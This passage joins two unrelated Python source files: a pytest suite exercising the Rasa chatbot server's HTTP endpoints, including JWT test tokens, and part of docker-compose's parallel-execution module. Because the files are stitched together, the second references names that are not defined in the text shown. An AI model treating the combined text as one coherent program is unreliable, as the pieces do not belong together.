_, response = rasa_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_without_enable_api(rasa_app_without_api: SanicTestClient):
_, response = rasa_app_without_api.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_version(rasa_app: SanicTestClient):
_, response = rasa_app.get("/version")
content = response.json
assert response.status == 200
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
def test_status(rasa_app: SanicTestClient, trained_rasa_model: Text):
_, response = rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
def test_status_nlu_only(rasa_app_nlu: SanicTestClient, trained_nlu_model: Text):
_, response = rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == trained_nlu_model
def test_status_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/status")
assert response.status == 401
def test_status_not_ready_agent(rasa_app: SanicTestClient):
rasa_app.app.agent = None
_, response = rasa_app.get("/status")
assert response.status == 409
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
from pathlib import Path
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> Text:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return fake_model_path
def run_server() -> NoReturn:
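# Replace rasa.train with the blocking fake, then start the HTTP server exactly as
# the "rasa run --enable-api" CLI would.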
import rasa
rasa.train = mocked_training_function
from rasa import __main__
import sys
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server)
yield server
server.terminate()
@pytest.fixture()
def training_request(shared_statuses: DictProxy) -> Generator[Process, None, None]:
def send_request() -> None:
with ExitStack() as stack:
formbot_data = dict(
domain="examples/formbot/domain.yml",
config="examples/formbot/config.yml",
stories="examples/formbot/data/stories.md",
nlu="examples/formbot/data/nlu.md",
)
payload = {
key: stack.enter_context(open(path)).read()
for key, path in formbot_data.items()
}
response = requests.post(
"http://localhost:5005/model/train",
json=payload,
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# For unknown reasons this test cannot be run in PyCharm (it results in
# segfaults), so it is skipped in that case; the test will still run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return requests.get("http://localhost:5005/status").status_code == 200
except Exception:
return False
# wait until server is up before sending train request and status test loop
while not is_server_ready():
time.sleep(1)
training_request.start()
# Wait until the blocking training function was called
while shared_statuses.get("started_training") is not True:
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
while shared_statuses.get("training_result") is None:
time.sleep(1)
# Check that the training worked correctly
assert shared_statuses["training_result"] == 200
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse(rasa_app: SanicTestClient, response_test: ResponseTest):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
rjs = response.json
assert response.status == 200
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse_with_different_emulation_mode(
rasa_app: SanicTestClient, response_test: ResponseTest
):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
assert response.status == 200
def test_parse_without_nlu_model(rasa_app_core: SanicTestClient):
_, response = rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == 200
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicTestClient):
_, response = rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == 400
def test_train_stack_success(
rasa_app: SanicTestClient,
default_domain_path: Text,
default_stories_file: Text,
default_stack_config: Text,
default_nlu_data: Text,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
stories_file = stack.enter_context(open(default_stories_file))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=stories_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert response.headers["filename"] is not None
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_nlu_success(
rasa_app: SanicTestClient,
default_stack_config: Text,
default_nlu_data: Text,
default_domain_path: Text,
):
domain_data = rasa_utils.io.read_yaml_file(default_domain_path)
config_data = rasa_utils.io.read_yaml_file(default_stack_config)
nlu_data = rasa_utils.io.read_yaml_file(default_nlu_data)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa_utils.io.write_yaml(payload, data)
_, response = rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_core_success(
rasa_app: SanicTestClient,
default_stack_config: Text,
default_stories_file: Text,
default_domain_path: Text,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(open(default_stories_file))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_with_retrieval_events_success(
rasa_app: SanicTestClient, default_stack_config: Text
):
with ExitStack() as stack:
domain_file = stack.enter_context(
open("data/test_domains/default_retrieval_intents.yml")
)
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(
open("data/test_stories/stories_retrieval_intents.md")
)
responses_file = stack.enter_context(open("data/test_responses/default.md"))
nlu_file = stack.enter_context(
open("data/test_nlu/default_retrieval_intents.md")
)
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
responses=responses_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert_trained_model(response.body)
def assert_trained_model(response_body: bytes) -> None:
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.parametrize(
"payload",
[
{"config": None, "stories": None, "nlu": None, "domain": None, "force": True},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"force": False,
"save_to_default_model_directory": True,
},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"save_to_default_model_directory": False,
},
],
)
def test_deprecation_warnings_json_payload(payload: Dict):
with pytest.warns(FutureWarning):
rasa.server._validate_json_training_payload(payload)
def test_train_with_yaml(rasa_app: SanicTestClient):
training_data = """
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- story: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
language: en
policies:
- name: RulePolicy
pipeline:
- name: WhitespaceTokenizer
- name: CountVectorsFeaturizer
- name: DucklingHTTPExtractor
- name: DIETClassifier
epochs: 1
"""
_, response = rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert_trained_model(response.body)
def test_train_with_invalid_yaml(rasa_app: SanicTestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = rasa_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 400
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(headers: Dict, expected: bool):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
({"save_to_default_model_directory": True}, rasa.constants.DEFAULT_MODELS_PATH),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request)
assert payload.get("output")
assert payload.get("output") == expected
def test_train_missing_config(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config=None)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_missing_training_data(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_internal_error(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 500
def test_evaluate_stories(rasa_app: SanicTestClient, default_stories_file: Text):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app.post("/model/test/stories", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicTestClient, default_stories_file: Text
):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == 409
def test_evaluate_stories_end_to_end(
rasa_app: SanicTestClient, end_to_end_story_file: Text
):
stories = rasa.utils.io.read_file(end_to_end_story_file)
_, response = rasa_app.post("/model/test/stories?e2e=true", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_intent(rasa_app: SanicTestClient, default_nlu_data: Text):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicTestClient, default_nlu_data: Text
):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_with_query_param(
rasa_app: SanicTestClient, trained_nlu_model, default_nlu_data: Text
):
_, response = rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
def test_predict(rasa_app: SanicTestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
}
}
_, response = rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == 200
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(rasa_app: SanicTestClient):
_, response = rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == 200
assert content["paused"] is False
assert content["slots"] == {"name": None}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
def test_pushing_event(rasa_app: SanicTestClient, event: Event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 1
evt = tracker.get("events")[0]
deserialised_event = Event.from_parameters(evt)
assert deserialised_event == event
assert deserialised_event.timestamp > time_before_adding_events
def test_push_multiple_events(rasa_app: SanicTestClient):
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{conversation_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
# there is also an `ACTION_LISTEN` event at the start
assert tracker.get("events") == events
def test_put_tracker(rasa_app: SanicTestClient):
data = [event.as_dict() for event in test_events]
_, response = rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == 200
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
def test_sorted_predict(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
def _create_tracker_for_sender(app: SanicTestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == 200
def test_get_tracker_with_jwt(rasa_secured_app: SanicTestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 200
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 403
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
def test_list_routes(default_agent: Agent):
from rasa import server
app = server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
def test_unload_model_error(rasa_app: SanicTestClient):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = rasa_app.delete("/model")
assert response.status == 204
def test_get_domain(rasa_app: SanicTestClient):
_, response = rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json
assert response.status == 200
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
def test_get_domain_invalid_accept_header(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain")
assert response.status == 406
def test_load_model(rasa_app: SanicTestClient, trained_core_model: Text):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
def test_load_model_from_model_server(
rasa_app: SanicTestClient, trained_core_model: Text
):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
import rasa.core.jobs
rasa.core.jobs.__scheduler = None
def test_load_model_invalid_request_body(rasa_app: SanicTestClient):
_, response = rasa_app.put("/model")
assert response.status == 400
def test_load_model_invalid_configuration(rasa_app: SanicTestClient):
data = {"model_file": "some-random-path"}
_, response = rasa_app.put("/model", json=data)
assert response.status == 400
def test_execute(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_execute_with_missing_action_name(rasa_app: SanicTestClient):
test_sender = "test_execute_with_missing_action_name"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 400
def test_execute_with_not_existing_action(rasa_app: SanicTestClient):
test_sender = "test_execute_with_not_existing_action"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 500
def test_trigger_intent(rasa_app: SanicTestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = rasa_app.post("/conversations/test_trigger/trigger_intent", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_trigger_intent_with_missing_intent_name(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 400
def test_trigger_intent_with_not_existing_intent(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
_create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 404
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
([RestInput(), SlackInput("test")], "slack", SlackBot),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
|
parallel.py
|
import _thread as thread
import logging
import operator
import sys
from queue import Empty
from queue import Queue
from threading import Lock
from threading import Semaphore
from threading import Thread
from docker.errors import APIError
from docker.errors import ImageNotFound
from compose.cli.colors import AnsiMode
from compose.cli.colors import green
from compose.cli.colors import red
from compose.cli.signals import ShutdownException
from compose.const import PARALLEL_LIMIT
from compose.errors import CompletedUnsuccessfully
from compose.errors import HealthCheckFailed
from compose.errors import NoHealthCheckConfigured
from compose.errors import OperationFailedError
log = logging.getLogger(__name__)
STOP = object()
class GlobalLimit:
"""Simple class to hold a global semaphore limiter for a project. This class
should be treated as a singleton that is instantiated when the project is.
"""
global_limiter = Semaphore(PARALLEL_LIMIT)
@classmethod
def set_global_limit(cls, value):
if value is None:
value = PARALLEL_LIMIT
cls.global_limiter = Semaphore(value)
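# Illustrative usage (an assumption about call sites, not shown in this module):
# the project-wide cap on concurrent operations can be tuned before any parallel
# work starts, for example:
#
#     GlobalLimit.set_global_limit(10)    # allow at most 10 operations at once
#     GlobalLimit.set_global_limit(None)  # fall back to PARALLEL_LIMIT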
def parallel_execute_watch(events, writer, errors, results, msg, get_name, fail_check):
""" Watch events from a parallel execution, update status and fill errors and results.
Returns exception to re-raise.
"""
error_to_reraise = None
for obj, result, exception in events:
if exception is None:
if fail_check is not None and fail_check(obj):
writer.write(msg, get_name(obj), 'failed', red)
else:
writer.write(msg, get_name(obj), 'done', green)
results.append(result)
elif isinstance(exception, ImageNotFound):
# This is to bubble up ImageNotFound exceptions to the client so we
# can prompt the user if they want to rebuild.
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
error_to_reraise = exception
elif isinstance(exception, APIError):
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, (OperationFailedError, HealthCheckFailed, NoHealthCheckConfigured,
CompletedUnsuccessfully)):
errors[get_name(obj)] = exception.msg
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, UpstreamError):
writer.write(msg, get_name(obj), 'error', red)
else:
errors[get_name(obj)] = exception
error_to_reraise = exception
return error_to_reraise
def parallel_execute(objects, func, get_name, msg, get_deps=None, limit=None, fail_check=None):
"""Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
get_deps called on object must return a collection with its dependencies.
get_name called on object must return its name.
fail_check is an additional failure check for cases that should display as a failure
in the CLI logs, but don't raise an exception (such as attempting to start 0 containers)
"""
objects = list(objects)
stream = sys.stderr
writer = ParallelStreamWriter.get_or_assign_instance(ParallelStreamWriter(stream))
for obj in objects:
writer.add_object(msg, get_name(obj))
for obj in objects:
writer.write_initial(msg, get_name(obj))
events = parallel_execute_iter(objects, func, get_deps, limit)
errors = {}
results = []
error_to_reraise = parallel_execute_watch(
events, writer, errors, results, msg, get_name, fail_check
)
for obj_name, error in errors.items():
stream.write("\nERROR: for {} {}\n".format(obj_name, error))
if error_to_reraise:
raise error_to_reraise
return results, errors
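# A minimal sketch (not part of compose itself) of how parallel_execute might be
# called; the objects, lambdas and message below are hypothetical placeholders.
def _parallel_execute_example():  # pragma: no cover - documentation example only
    items = ['db', 'cache', 'web']
    results, errors = parallel_execute(
        items,
        func=lambda name: name.upper(),  # the work to run for each object
        get_name=lambda name: name,      # label used for the progress line
        msg='Processing',
        limit=2,                         # at most two producer threads at a time
    )
    return results, errors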
def _no_deps(x):
return []
class State:
"""
Holds the state of a partially-complete parallel operation.
state.started: objects being processed
state.finished: objects which have been processed
state.failed: objects which either failed or whose dependencies failed
"""
def __init__(self, objects):
self.objects = objects
self.started = set()
self.finished = set()
self.failed = set()
def is_done(self):
return len(self.finished) + len(self.failed) >= len(self.objects)
def pending(self):
return set(self.objects) - self.started - self.finished - self.failed
class NoLimit:
def __enter__(self):
pass
def __exit__(self, *ex):
pass
def parallel_execute_iter(objects, func, get_deps, limit):
"""
    Runs func on objects in parallel while ensuring that func is
    run on an object only after it has been run on all of its dependencies.
Returns an iterator of tuples which look like:
# if func returned normally when run on object
(object, result, None)
# if func raised an exception when run on object
(object, None, exception)
# if func raised an exception when run on one of object's dependencies
(object, None, UpstreamError())
"""
if get_deps is None:
get_deps = _no_deps
if limit is None:
limiter = NoLimit()
else:
limiter = Semaphore(limit)
results = Queue()
state = State(objects)
while True:
feed_queue(objects, func, get_deps, results, state, limiter)
try:
event = results.get(timeout=0.1)
except Empty:
continue
# See https://github.com/docker/compose/issues/189
except thread.error:
raise ShutdownException()
if event is STOP:
break
obj, _, exception = event
if exception is None:
log.debug('Finished processing: {}'.format(obj))
state.finished.add(obj)
else:
log.debug('Failed: {}'.format(obj))
state.failed.add(obj)
yield event
def producer(obj, func, results, limiter):
"""
The entry point for a producer thread which runs func on a single object.
Places a tuple on the results queue once func has either returned or raised.
"""
with limiter, GlobalLimit.global_limiter:
try:
result = func(obj)
results.put((obj, result, None))
except Exception as e:
results.put((obj, None, e))
